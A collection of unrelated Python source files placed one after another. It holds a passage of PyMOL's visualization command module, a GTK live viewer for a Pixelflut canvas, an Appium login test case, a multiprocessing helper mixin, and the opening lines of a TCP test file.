Scenes F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the behaviour
of the respective key.
SEE ALSO
view, set_view, get_view
'''
action = scene_action_sc.auto_err(action, 'action')
if is_list(message):
message = '\n'.join(message)
# default when called with no arguments
if key == 'auto':
if action == 'recall':
action = 'next'
# preserve message on update
if action == 'update':
if message is None:
message = _scene_get_current_message(_self)
# aliases (DEPRECATED)
if action == 'clear':
action = 'delete'
elif action == 'append' or action == 'update':
action = 'store'
# presentation auto quit
if (pymol._scene_quit_on_action == action and
action in ('next', 'previous') and
_self.get_setting_boolean("presentation") and
_self.get_setting_boolean("presentation_auto_quit") and
_self.get("scene_current_name") == ""):
if not chain_session(_self):
_self.quit()
# call C function
def func():
with _self.lockcm:
return _cmd.scene(_self._COb, key, action, message, int(view),
int(color),
int(active), int(rep), int(frame),
float(animate), new_key, int(hand), sele)
r = _self._call_with_opengl_context(func)
# for presentation auto quit
pymol._scene_quit_on_action = action
return r
def _legacy_scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, *, _self=cmd):
''' FOR INTERNAL USE ONLY. Stores and deletes <=1.7.4 compatible scenes. '''
pymol=_self._pymol
view = int(view)
rep = int(rep)
color = int(color)
active = int(active)
frame = int(frame)
quiet = int(quiet)
animate = 0
with _self.lockcm:
if key=='*':
if action=='clear':
for key in pymol._scene_dict:
# free selections
scene_list = pymol._scene_dict[key]
if len(scene_list)>3:
colorection = scene_list[3]
if colorection is not None:
_self.del_colorection(colorection,key)
name = "_scene_"+key+"_*"
_self.delete(name)
else:
raise ValueError('action=' + action)
else:
if action == 'store':
if key in ('new', 'auto'):
raise ValueError('key=' + key)
if key in pymol._scene_dict:
raise RuntimeError('update not supported')
if rep:
for rep_name in rep_list:
name = "_scene_"+key+"_"+rep_name
_self.select(name,"rep "+rep_name)
if is_string(message):
if message:
if (message[0:1] in [ '"',"'"] and
message[-1:] in [ '"',"'"]):
message=message[1:-1]
else:
message = message.splitlines()
pymol._scene_dict[key] = [
_self.get_view(0) if view else None,
_self.get_vis() if active else None,
_self.get_frame() if frame else None,
_self.get_colorection(key) if color else None,
1 if rep else None,
message,
]
else:
raise ValueError('action=' + action)
def session_save_views(session, *, _self=cmd):
pymol=_self._pymol
session['view_dict']=copy.deepcopy(pymol._view_dict)
return 1
def session_restore_views(session, *, _self=cmd):
pymol=_self._pymol
if 'view_dict' in session:
pymol._view_dict=copy.deepcopy(session['view_dict'])
pymol._view_dict_sc.rebuild(list(pymol._view_dict.keys()))
return 1
def session_restore_scenes(session, *, _self=cmd):
# Restore scenes from old session files (<= 1.7.4)
if 'scene_dict' in session:
_self.scene('*', 'clear')
# save initial scene
tempname = '_initial_scene'
while tempname in session['scene_dict']:
tempname += '_'
_self.scene(tempname, 'store')
frame = 0
if _self.get_movie_playing():
_self.mstop()
frame = _self.get_frame()
for key, data in list(session['scene_dict'].items()):
_convert_legacy_scene(key, data, _self)
if frame:
_self.frame(frame)
_self.mplay()
# restore initial scene
_self.scene(tempname, 'recall', animate=0)
_self.scene(tempname, 'clear')
if 'scene_order' in session:
_self.scene_order(' '.join(session['scene_order']))
return 1
def _convert_legacy_scene(key, scene_list, _self=cmd):
# Create a scene from the given legacy scene list and finally delete
# the colorection and rep selections.
scene_list += [None] * 5
view, active, frame, color, rep = [(0 if x is None else 1)
for x in scene_list[:5]]
if frame:
_self.frame(scene_list[2])
if view:
_self.set_view(scene_list[0], 0.0)
if active:
_self.disable()
_self.deselect()
_self.set_vis(scene_list[1])
if color:
_self.set_colorection(scene_list[3], key)
_self.del_colorection(scene_list[3], key)
if rep:
# only atomic representations
_self.hide('everything', '(*)')
sele_prefix = _self.get_legal_name('_scene_' + key + '_')
for rep_name in rep_list:
_self.show(rep_name, "?" + sele_prefix + rep_name)
_self.delete(sele_prefix + "*")
_self.scene(key, 'store', scene_list[5], view, color, active, rep, frame)
def stereo(toggle='on', quiet=1, *, _self=cmd):
'''
DESCRIPTION
"stereo" activates or deactives stereo mode.
USAGE
stereo [toggle]
ARGUMENTS
toggle = on, off, crosseye, walleye, quadbuffer, sidebyside, geowall, or openvr
EXAMPLES
stereo on
stereo off
stereo crosseye
NOTES
"quadbuffer" is the default stereo mode if hardware stereo is available.
otherwise, "crosseye" is the default.
PYMOL API
cmd.stereo(string toggle)
'''
toggle = stereo_dict[stereo_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
return _cmd.stereo(_self._COb, toggle)
def turn(axis, angle, *, _self=cmd):
'''
DESCRIPTION
"turn" rotates the camera about one of the three primary axes,
centered at the origin.
USAGE
turn axis, angle
EXAMPLES
turn x, 90
turn y, 45
PYMOL API
cmd.turn(string axis, float angle)
SEE ALSO
move, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
r = _cmd.turn(_self._COb,str(axis),float(angle))
return r
def full_screen(toggle=-1, *, _self=cmd):
'''
DESCRIPTION
"full_screen" enables or disables full screen mode.
USAGE
full_screen [toggle]
EXAMPLES
full_screen
full_screen on
full_screen off
NOTES
This does not work correctly on all platforms. If you encounter
trouble, try using the maximize button on the viewer window
instead.
'''
toggle = toggle_dict[toggle_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
if _self.is_gui_thread():
return _cmd.full_screen(_self._COb,int(toggle))
return _self._do("full_screen %s" % (toggle), echo=0)
def rock(mode=-1, *, _self=cmd):
'''
DESCRIPTION
"rock" toggles Y axis rocking.
USAGE
rock
PYMOL API
cmd.rock()
'''
with _self.lockcm:
r = _cmd.rock(_self._COb,int(mode))
return r
def label(selection="(all)", expression="", quiet=1, *, _self=cmd):
'''
DESCRIPTION
"label" labels one or more atoms in a selection by evaluating an
Python expression referencing properties for each atom.
USAGE
label [ selection [, expression ]]
ARGUMENTS
selection = string: a selection-expression
expression = string: a Python expression that can be converted to a string
EXAMPLES
label chain A, chain
label name CA,"%s-%s" % (resn,resi)
label resi 200,"%1.3f" % partial_charge
NOTES
The symbols defined in the label name space for each atom are:
name, resi, resn, resv, chain, segi, model, alt, q, b, type,
index, rank, ID, ss, vdw, elec_radius, label, elem, geom,
flags, color, cartoon, valence, formal_charge, partial_charge,
numeric_type, text_type, stereo
All strings in the expression must be explicitly quoted.
This operation typically takes several seconds per thousand atoms
labelled.
To clear labels, simply omit the expression or set it to ''.
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label(_self._COb, selection, expression, quiet)
def label2(selection="(all)", expression="", quiet=1, *, _self=cmd):
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label2(_self._COb, selection, expression, quiet)
def window(action='show', x=0, y=0, width=0, height=0, *, _self=cmd):
'''
DESCRIPTION
"window" controls the visibility of PyMOL\'s output window
USAGE
window [ action [, x [, y [, width [, height ]]]]]
PYMOL API
cmd.window(string action, int x, int y, int width, int height)
'''
action = window_sc.auto_err(action,'action')
action = window_dict[str(action)]
with _self.lockcm:
from pymol.gui import get_qtwindow as getPyMOLWindow
qt_window = getPyMOLWindow()
if qt_window:
r = DEFAULT_SUCCESS
qt_window.window_cmd(action, int(x),int(y),int(width),int(height))
else:
r = _cmd.window(_self._COb,action,int(x),int(y),int(width),int(height))
return r
def viewport(width=-1,height=-1, *, _self=cmd):
'''
DESCRIPTION
"viewport" changes the size of the graphics display area.
USAGE
viewport width, height
PYMOL API
cmd.viewport(int width, int height)
'''
if cmd.is_string(width) and height == -1:
width = _self.safe_eval(width)
if _self.is_sequence(width):
colorprinting.warning(" Warning: Tuple-syntax (parentheses) "
"for viewport is deprecated")
width, height = width
if not cmd.is_gui_thread():
_self.do("viewport %d,%d"%(int(width),int(height)),0)
return None
with _self.lockcm:
return _cmd.viewport(_self._COb, int(width), int(height))
def bg_color(color="black", *, _self=cmd):
'''
DESCRIPTION
"bg_color" sets the background color.
USAGE
bg_color [ color ]
ARGUMENTS
color = string: color name or number {default: black}
EXAMPLES
bg_color grey30
bg_color
NOTES
To obtain a transparent background, "unset opaque_background", and
then use "ray".
SEE ALSO
set_color, ray
PYMOL API
cmd.bg_color(string color)
'''
color = _self._interpret_color(_self,color)
with _self.lockcm:
r = _cmd.bg_color(_self._COb,str(color))
return r
cartoon_dict = {
'skip' : -1,
'automatic' : 0,
'loop' : 1,
'rectangle' : 2,
'oval' : 3,
'tube' : 4,
'arrow' : 5,
'dumbbell' : 6,
'putty' : 7,
'dash' : 8,
'cylinder' : 9,
}
cartoon_sc = Shortcut(cartoon_dict.keys())
def cartoon(type, selection="(all)", *, _self=cmd):
'''
DESCRIPTION
"cartoon" changes the default cartoon representation for a set of atoms.
USAGE
cartoon type, selection
ARGUMENTS
type = automatic, skip, loop, rectangle, oval, tube, arrow, dumbbell
PYMOL API
cmd.cartoon(string type, string selection)
EXAMPLES
cartoon rectangle, chain A
cartoon skip, resi 145-156
NOTES
This command is rarely required since the default "automatic" mode
chooses cartoons according to the information in the PDB HELIX and
SHEET records.
'''
# preprocess selection
selection = selector.process(selection)
#
type = cartoon_dict[cartoon_sc.auto_err(str(type),'type')];
with _self.lockcm:
return _cmd.cartoon(_self._COb, selection, int(type))
def _ray(width,height,antialias,angle,shift,renderer,quiet,_self=cmd):
r = DEFAULT_ERROR
try:
_self.lock_without_glut()
try:
_cmd.set_busy(_self._COb,1)
r = _cmd.render(_self._COb,int(width),int(height),
int(antialias),
float(angle),
float(shift),int(renderer),
int(quiet))
finally:
_cmd.set_busy(_self._COb,0)
finally:
_self.unlock(r)
return r
def capture(quiet=1, *, _self=cmd):
_self.draw(antialias=-2,quiet=quiet)
def draw(width=0, height=0, antialias=-1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"draw" creates an OpenGL-based image of the current frame.
USAGE
draw [width [,height [,antialias ]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
EXAMPLES
draw
draw 1600
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
Because this feature uses the OpenGL rendering context to piece
together the image, it does not work when running in the
command-line only mode.
On certain graphics hardware, "unset opaque_background" followed
by "draw" will produce an image with a transparent background.
However, better results can usually be obtained using "ray".
PYMOL API
cmd.draw(int width, int height, int antialias, int quiet)
SEE ALSO
ray, png, save
'''
# stop movies and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
#
def func():
with _self.lockcm:
# make sure that there aren't any pending display events
# TODO could this be fixed with PYMOL-3328 (SceneUpdate)?
_cmd.refresh_now(_self._COb)
return _cmd.draw(_self._COb,int(width),int(height),
int(antialias),int(quiet))
return _self._call_with_opengl_context(func)
def ray(width=0, height=0, antialias=-1, angle=0.0, shift=0.0,
renderer=-1, quiet=1, async_=0, _self=cmd, **kwargs):
'''
DESCRIPTION
"ray" creates a ray-traced image of the current frame. This
can take some time (up to several minutes, depending on image
complexity).
USAGE
ray [width [,height [,antialias [,angle [,shift [,renderer [,quiet
[,async ]]]]]]]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
angle = float: y-axis rotation for stereo image generation
{default: 0.0}
shift = float: x-axis translation for stereo image generation
{default: 0.0}
renderer = -1, 0, 1, or 2: respectively, default, built-in,
pov-ray, or dry-run {default: 0}
async = 0 or 1: should rendering be done in a background thread?
EXAMPLES
ray
ray 1024,768
ray renderer=2
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
angle and shift can be used to generate matched stereo pairs
renderer = 1 uses PovRay. This is Unix-only and you must have
"povray" in your path. It utilizes two two temporary files:
"tmp_pymol.pov" and "tmp_pymol.png".
See "help faster" for optimization tips with the builtin renderer.
See "help povray" for how to use PovRay instead of PyMOL\'s
built-in ray-tracing engine.
PYMOL API
cmd.ray(int width, int height, int antialias, float angle,
float shift, int renderer, int quiet, int async)
SEE ALSO
draw, png, save
'''
async_ = int(kwargs.pop('async', async_))
if kwargs:
raise pymol.CmdException('unknown argument: ' + ', '.join(kwargs))
arg_tup = (int(width),int(height),
int(antialias),float(angle),
float(shift),int(renderer),int(quiet),_self)
# stop movies, rocking, and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
if _self.rock(-2)>0:
_self.rock(0)
#
if not async_:
r = _ray(*arg_tup)
else:
render_thread = threading.Thread(target=_ray, args=arg_tup)
render_thread.setDaemon(1)
render_thread.start()
r = DEFAULT_SUCCESS
return r
def refresh(_self=cmd):
'''
DESCRIPTION
"refresh" causes the scene to be redrawn as soon as the operating
system allows it to be done.
USAGE
refresh
PYMOL API
cmd.refresh()
SEE ALSO
rebuild
'''
if _self.is_gui_thread():
return _self._refresh()
with _self.lockcm:
return _self._do("_ cmd._refresh()")
def reset(object='', *, _self=cmd):
'''
DESCRIPTION
"reset" restores the rotation matrix to identity, sets the origin
to the center of mass (approx.) and zooms the window and clipping
planes to cover all objects. Alternatively, it can reset object
matrices.
USAGE
reset [ object ]
PYMOL API
cmd.reset()
'''
with _self.lockcm:
return _cmd.reset(_self._COb, str(object))
def dirty(_self=cmd): # OBSOLETE?
with _self.lockcm:
r = _cmd.dirty(_self._COb)
return r
def meter_reset(_self=cmd):
'''
DESCRIPTION
"meter_reset" resets the frames per secound counter.
USAGE
meter_reset
'''
with _self.lockcm:
r = _cmd.reset_rate(_self._COb)
return r
def load_png(filename, movie=1, stereo=-1, quiet=0, *, _self=cmd):
'''
DESCRIPTION
"load_png" loads and displays a PNG file from disk.
USAGE
load_png filename
NOTES
If the displayed image is too big for the window, it will be
reduced 2-fold repeatedly until it fits.
'''
filename = _self.exp_path(str(filename))
with _self.lockcm:
return _cmd.load_png(_self._COb, filename, int(movie), int(stereo),
int(quiet))
def rebuild(selection='all',representation='everything', *, _self=cmd):
'''
DESCRIPTION
"rebuild" forces PyMOL to recreate geometric objects in
case any of them have gone out of sync.
USAGE
rebuild [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string: {default: everything}
PYMOL API
cmd.rebuild(string selection, string representation)
SEE ALSO
refresh
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation];
with _self.lockcm:
return _cmd.rebuild(_self._COb, selection, repn)
def recolor(selection='all', representation='everything', *, _self=cmd):
'''
DESCRIPTION
"recolor" forces reapplication of colors to existing objects.
USAGE
recolor [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string {default: everything}
NOTES
This command often needs to be executed after "set_color" has been
used to redefine one or more existing colors.
PYMOL API
cmd.recolor(string selection = 'all', string representation = 'everything')
SEE ALSO
color, set_color
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation];
with _self.lockcm:
return _cmd.recolor(_self._COb, selection, repn)
def color(color, selection="(all)", quiet=1, flags=0, *, _self=cmd):
'''
DESCRIPTION
"color" changes the color of objects or atoms.
USAGE
color color [, selection ]
ARGUMENTS
color = string: color name or number
selection = string: selection-expression or name-pattern
corresponding to the atoms or objects to be colored
{default: (all)}.
NOTES
When using color ramps, the ramp can be used as a color.
PYMOL API
cmd.color(string color, string selection, int quiet)
SEE ALSO
color_deep, set_color, recolor
EXAMPLE
color cyan
color yellow, chain A
'''
# preprocess selection
selection = selector.process(selection)
color = _self._interpret_color(_self,str(color))
with _self.lockcm:
return _cmd.color(_self._COb, str(color), str(selection),
int(flags), int(quiet))
def color_deep(color, name='all', quiet=1, *, _self=cmd):
'''
DESCRIPTION
Unset all object and atom level (not global) color settings and
apply given color.
ARGUMENTS
color = str: color name or number
name = str: object name or pattern {default: all}
SEE ALSO
color, unset_deep
'''
from pymol.menu import rep_setting_lists
_self.unset_deep([s for L in rep_setting_lists for (r, s) in L if s],
name, updates=0, quiet=quiet)
_self.color(color, name, quiet=quiet)
import colorsys
_spectrumany_interpolations = {
'hls': (colorsys.rgb_to_hls, colorsys.hls_to_rgb),
'hsv': (colorsys.rgb_to_hsv, colorsys.hsv_to_rgb),
'rgb': ((lambda *rgb: rgb), (lambda *rgb: rgb)),
}
def spectrumany(expression, colors, selection='(all)', minimum=None,
maximum=None, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
Pure python implementation of the spectrum command. Supports arbitrary
color lists instead of palettes and any numerical atom property which
works in iterate as expression.
Non-numeric values (like resn) will be enumerated.
This is not a separate PyMOL command but is used as a fallback in "spectrum".
'''
from . import CmdException
try:
from_rgb, to_rgb = _spectrumany_interpolations[interpolation]
except KeyError:
raise CmdException('interpolation must be one of {}'.format(
list(_spectrumany_interpolations)))
if ' ' not in colors:
colors = palette_colors_dict.get(colors) or colors.replace('_', ' ')
quiet, colors = int(quiet), colors.split()
n_colors = len(colors)
if n_colors < 2:
raise CmdException('please provide at least 2 colors')
col_tuples = [_self.get_color_tuple(i) for i in colors]
if None in col_tuples:
raise CmdException('unknown color')
col_tuples = [from_rgb(*c) for c in col_tuples]
expression = {'pc': 'partial_charge', 'fc': 'formal_charge',
'resi': 'resv'}.get(expression, expression)
if expression == 'count':
e_list = list(range(_self.count_atoms(selection)))
else:
e_list = []
_self.iterate(selection, 'e_list.append(%s)' % (expression), space=locals())
try:
v_list = [float(v) for v in e_list if v is not None]
except (TypeError, ValueError):
if not quiet:
print(' Spectrum: Expression is non-numeric, enumerating values')
v_list = e_list = list(map(sorted(set(e_list)).index, e_list))
if not v_list:
return (0., 0.)
if minimum is None: minimum = min(v_list)
if maximum is None: maximum = max(v_list)
r = minimum, maximum = float(minimum), float(maximum)
if not quiet:
print(' Spectrum: range (%.5f to %.5f)' % r)
val_range = maximum - minimum
if not val_range:
_self.color(colors[0], selection)
return r
e_it = iter(e_list)
def next_color():
v = next(e_it)
if v is None:
return False
v = min(1.0, max(0.0, (float(v) - minimum) / val_range)) * (n_colors - 1)
i = min(int(v), n_colors - 2)
p = v - i
col = [(col_tuples[i+1][j] * p + col_tuples[i][j] * (1.0 - p))
for j in range(3)]
rgb = [int(0xFF * v) for v in to_rgb(*col)]
return 0x40000000 + rgb[0] * 0x10000 + rgb[1] * 0x100 + rgb[2]
_self.alter(selection, 'color = next_color() or color', space=locals())
_self.recolor(selection)
return r
def spectrum(expression="count", palette="rainbow",
selection="(all)", minimum=None, maximum=None,
byres=0, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
"spectrum" colors atoms with a spectrum of colors based on an atomic
property.
USAGE
spectrum [expression [, palette [, selection [, minimum [, maximum [, byres ]]]]]]
ARGUMENTS
expression = count, b, q, or pc: respectively, atom count, temperature factor,
occupancy, or partial charge {default: count}
palette = string: palette name or space separated list of colors
{default: rainbow}
selection = string: atoms to color {default: (all)}
minimum = float: {default: None (automatic)}
maximum = float: {default: None (automatic)}
byres = integer: controls whether coloring is applied per-residue {default: 0}
EXAMPLES
spectrum b, blue_red, minimum=10, maximum=50
spectrum count, rainbow_rev, chain A, byres=1
NOTES
Available palettes include:
blue_green blue_magenta blue_red blue_white_green
blue_white_magenta blue_white_red blue_white_yellow blue_yellow
cbmr cyan_magenta cyan_red cyan_white_magenta cyan_white_red
cyan_white_yellow cyan_yellow gcbmry green_blue green_magenta
green_red green_white_blue green_white_magenta green_white_red
green_white_yellow green_yellow green_yellow_red magenta_blue
magenta_cyan magenta_green magenta_white_blue
magenta_white_cyan magenta_white_green magenta_white_yellow
magenta_yellow rainbow rainbow2 rainbow2_rev rainbow_cycle
rainbow_cycle_rev rainbow_rev red_blue red_cyan red_green
red_white_blue red_white_cyan red_white_green red_white_yellow
red_yellow red_yellow_green rmbc yellow_blue yellow_cyan
yellow_cyan_white yellow_green yellow_magenta yellow_red
yellow_white_blue yellow_white_green yellow_white_magenta
yellow_white_red yrmbcg
PYMOL API
def spectrum(string expression, string palette,
string selection, float minimum, float maximum,
int byres, int quiet)
'''
palette_hit = palette_sc.shortcut.get(palette)
if palette_hit:
palette = palette_hit
if not expression.replace('_', '').isalpha() or not palette_hit:
return spectrumany(expression, palette, selection,
minimum, maximum, quiet, interpolation, _self=_self)
(prefix,digits,first,last) = palette_dict[str(palette)]
if (maximum is None) or (minimum is None):
minimum = 0 # signal to auto-adjust levels
maximum = -1
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.spectrum(_self._COb,str(selection),str(expression),
float(minimum),float(maximum),
int(first),int(last),str(prefix),
int(digits),int(byres),int(quiet))
return r
def set_color(name, rgb, mode=0, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"set_color" defines a new color using the red, green, and blue
(RGB) color components.
USAGE
set_color name, rgb
ARGUMENTS
name = string: name for the new or existing color
rgb = list of numbers: [red, green, blue] each and all in the range
(0.0, 1.0) or (0, 255)
EXAMPLES
set_color red, [ 1.0, 0.0, 0.0 ]
set_color yellow, [ 255, 255, 0 ]
NOTES
PyMOL automatically infers the range based on the input arguments.
It may be necessary to issue "recolor" command in order to force
recoloring of existing objects.
SEE ALSO
recolor
PYMOL API
cmd.set_color(string name, list-of-numbers rgb, int mode )
'''
if isinstance(rgb, (str, bytes)):
rgb = safe_list_eval(rgb)
if not isinstance(rgb, (list, tuple)) or len(rgb) != 3:
raise pymol.CmdException(
"color specification must be a list such as [ 1.0, 0.0, 0.0 ]")
rgb = [float(c) for c in rgb]
if rgb[0] > 1.0 or rgb[1] > 1.0 or rgb[2] > 1.0:
rgb = [c / 0xFF for c in rgb]
with _self.lockcm:
r = _cmd.colordef(_self._COb, str(name), rgb[0], rgb[1], rgb[2],
int(mode), int(quiet))
_self._invalidate_color_sc()
return r
# Aliases for Mother England.
colour = color
set_colour = set_color
bg_colour = bg_color
recolour = recolor
def ipython_image(*args, _self=cmd, **kwargs):
"""Render the scene and return the image as an IPython.display.Image.
All arguments are forwarded to cmd.png().
@rtype IPython.display.Image
"""
import os, tempfile
from IPython.display import Image
filename = tempfile.mktemp(".png")
_self.png(filename, *args, **kwargs)
try:
return Image(filename)
finally:
os.unlink(filename)
|
live_display.py
|
#!/usr/bin/env python3
import argparse
import time
import threading
import os
import sys
import gi
gi.require_version("Gtk", "3.0")
gi.require_version("GdkPixbuf", "2.0")
from gi.repository import Gtk, GdkPixbuf, GLib, GObject
SRC_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.dirname(__file__)), "src"))
sys.path.append(SRC_DIR)
from pixelflut_client import Client, BinaryAlgorithms
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("server_hostname")
parser.add_argument("server_port")
return parser.parse_args()
def get_new_pixbuf():
global client
receive_start = time.time()
pixels = client.receive_binary(BinaryAlgorithms.RgbBase64)
receive_end = time.time()
render_start = time.time()
pixbuf = GdkPixbuf.Pixbuf.new_from_bytes(
GLib.Bytes.new(pixels),
GdkPixbuf.Colorspace.RGB,
False,
8,
client.size[0],
client.size[1],
client.size[0] * 3,
)
render_end = time.time()
line = f"receiving: {receive_end - receive_start}s, rendering: {render_end - render_start}s, fps: {1 / ((receive_end - receive_start) + (render_end - render_start))}"
print(f"\033[K{line}\033[{len(line)}D", end="", flush=True)
return pixbuf
def display_pixbuf(pixbuf):
global image
image.set_from_pixbuf(pixbuf)
def update():
while True:
pixbuf = get_new_pixbuf()
GLib.idle_add(display_pixbuf, pixbuf)
if __name__ == "__main__":
args = parse_args()
client = Client()
client.connect(args.server_hostname, int(args.server_port))
window = Gtk.Window(title=f"Pixelflut remote canvas ({args.server_hostname}:{args.server_port})")
window.set_default_size(client.size[0], client.size[1])
window.connect("destroy", Gtk.main_quit)
image = Gtk.Image.new()
window.add(image)
window.show_all()
worker = threading.Thread(target=update)
worker.daemon = True
worker.start()
Gtk.main()
|
try_login_case.py
|
# -*- coding: utf-8 -*-
# @Author : xiaoke
# @Email : 976249817@qq.com
import unittest
from time import sleep
from business.login_business import LoginBusiness
import sys, traceback
from base.login_exception import LoginException
# 第一种方式解决,# 第二种使用元类解决 # 第三种采用一个函数即可实现
class ParameTestCase(unittest.TestCase):
def __init__(self, methodName='runTest', parame=None):
super().__init__(methodName)
self.parame = parame
global global_i
global_i = self.parame
class TestLoginCase(ParameTestCase):
@classmethod
def setUpClass(cls):
# 注意以下的写法,每次都创建出一个driver,也就是一个session,那么就会报错已有session了:
# 报错如下 a session eithor terminder or not start
cls.login_business = LoginBusiness(global_i)
# cls.splash_business = SplashBusiness(global_i)
cls.exception_list = LoginException()
def setUp(self):
print("this is setup")
def test01(self):
# 休息4秒的原因是为了等待手动找到登录页面,进行操作
sleep(4)
self.login_business.login_success()
# def test02(self):
# print("test02")
# self.login_business.login_user_error()
def tearDown(self):
sleep(1)
print("this is teardown")
print("++++++++++++++++++>>>>%s" % str(sys.exc_info()[1]))
print("++++++++++++++++++>>>>%s" % str(self.exception_list.get_exception_length()))
# 运行一个case结束后,判断异常列表中如果有异常,则截图
if self.exception_list.get_exception_length():
self.login_business.login_handle.login_page.driver.get_screenshot_as_file("../image/login_error.png")
@classmethod
def tearDownClass(cls):
print("this is teardownclass")
# print("++++++++++++++++++>>>>%s" % str(sys.exc_info()[1])) # 捕获异常
# def appium_server():
# server = Server()
# server.main()
#
#
# # 添加多个suit
# def get_suite(i):
# suite = unittest.TestSuite()
# suite.addTest(TestLoginCase("test01", parame=i))
# suite.addTest((TestLoginCase("test02", parame=i)))
# # unittest.TextTestRunner().run(suite)
# # unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output="interface"))
# # HtmlTestRunner.HTMLTestRunner(output="login_test", report_title="xiaoke").run(suite)
# # html_file = "E:/pycharmProject/appium/appiumProject/reports/login_test" + str(i) + ".html"
# # with open(html_file, "w") as f:
# HtmlTestRunner.HTMLTestRunner(output="test").run(suite)
#
#
# if __name__ == '__main__':
# # 在项目开始之前先启动appium服务
# appium_server()
# threads = []
# for i in range(2):
# # 有几个设备就产生几个报告
# # 多线程会产生数据串连,达不到想要的结果
# # th = threading.Thread(target=get_suite, args=(i,))
# th = multiprocessing.Process(target=get_suite, args=(i,))
# threads.append(th)
#
# for y in threads:
# # 由于是多线程执行,为了让每个线程生成的报告都显示,那我就让每个线程延时1秒执行
# # 这样就可以把每个线程生成的报告显示出来
# sleep(1)
# y.start()
|
process_mixin.py
|
# Copyright 2020 Pax Syriana Foundation. Licensed under the Apache License, Version 2.0
#
import time
from abc import ABCMeta
from abc import abstractmethod
from multiprocessing import Process
from multiprocessing.managers import BaseManager
from via_common.multiprocess.logger_manager import LoggerManager
from via_common.multiprocess.pipe_adapter import PipeAdapter
from via_common.util.config_mixin_logger import ConfigMixInLogger
from via_common.util.config_mixin_server import ConfigMixInServer
class ProcessMixin(metaclass=ABCMeta):
"""
A helper MixIn to manage sub-process for connecting to a server.
Each object can spawn only one sub-process.
The object set-up the necessary plumbing for the sub-process to access the multiprocessing
system_queue, logger_queue queue and any other queues given as arguments by name.
Derived classes are responsible for defining:
- the shutdown mechanism. It can use the system_queue.
- the logger object must be set by the derived classes.
- the _run_child_forever interface. For convenience the logger_queue is passed as an
argument.
"""
def __init__(self, process_name, config_internal_conn: ConfigMixInServer, config_logger: ConfigMixInLogger, queue_name_list, shutdown_receiver):
self.process_name = process_name
self.config_internal_conn = config_internal_conn
self.config_logger = config_logger
self.queue_name_list = queue_name_list
self.shutdown_receiver = shutdown_receiver
self.shutdown_handler = None
self.system_queue = None
self.impl = Process(target=self._run_child_process, args=(config_internal_conn.__class__, config_logger.__class__,), daemon=True)
self.logger = None
self._initialise_child_logger()
if not self.logger:
raise ValueError('The logger of the process object must be setup')
@abstractmethod
def shutdown(self):
# The mechanism uses a pipe to send a SIGNAL_SHUTDOWN_START command to each process.
# The pipe is handled by an orchestrator.
raise NotImplementedError
@abstractmethod
def _initialise_child_logger(self):
# the queue for the logger is set by ProcessMixin,
# but the derived objects need to set the logger for themselves,
# otherwise, the class name would be the one of the base class in the log
raise NotImplementedError
@abstractmethod
def _run_child_forever(self):
# The base class uses _run_child_process to initialise the process, then it passes responsibility
# to the derived object to do further work is needed.
raise NotImplementedError
#
# Process override
#
def start(self):
self.impl.start()
def join(self):
self.impl.join()
def close(self):
self.impl.close()
def get_process(self):
return self.impl
#
# Process.target
#
def _run_child_process(self, config_conn_cls, config_logger_cls):
# All this is to setup the logger_queue to be able to log.
self.config_internal_conn = config_conn_cls()
self.config_logger = config_logger_cls()
# arguments here are passed through pickle. They cannot be class member
self.shutdown_handler = PipeAdapter(self.shutdown_receiver, self.shutdown)
self.shutdown_handler.start()
if self.queue_name_list:
for queue_name in self.queue_name_list:
BaseManager.register(queue_name)
# end for queue_name in queue_name_list
# end if queue_name_list
BaseManager.register('logger_queue')
BaseManager.register('system_queue')
manager = BaseManager(address=(self.config_internal_conn.host(),
self.config_internal_conn.port()),
authkey=self.config_internal_conn.authkey().encode())
time.sleep(0.5)
attempt = 5
while attempt:
try:
manager.connect()
break
except Exception as e: # TODO exception: which one(s)
attempt -= 1
# end while attempt
if attempt == 0:
raise RuntimeError("{} child process FAILED to start".format((self.__class__.__name__)))
# Create the object fields for the queues
if self.queue_name_list:
for queue_name in self.queue_name_list:
self.__dict__[queue_name] = manager.__getattribute__(queue_name)()
# end for queue_name in queue_name_list
# end if queue_name_list
# Set the queue for the logger
self.system_queue = manager.system_queue()
logger_queue = manager.logger_queue()
LoggerManager.set_child_logger_queue(self.config_logger, logger_queue)
self.logger = LoggerManager.get_logger(self.process_name)
self.logger.info('Sub-process [{}] initialized'.format(self.process_name))
self._run_child_forever(logger_queue)
|
test_tcp.py
|
# -*- coding: utf-8 -*-
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
from __future__ import absolute_import, print_function, unicode_literals
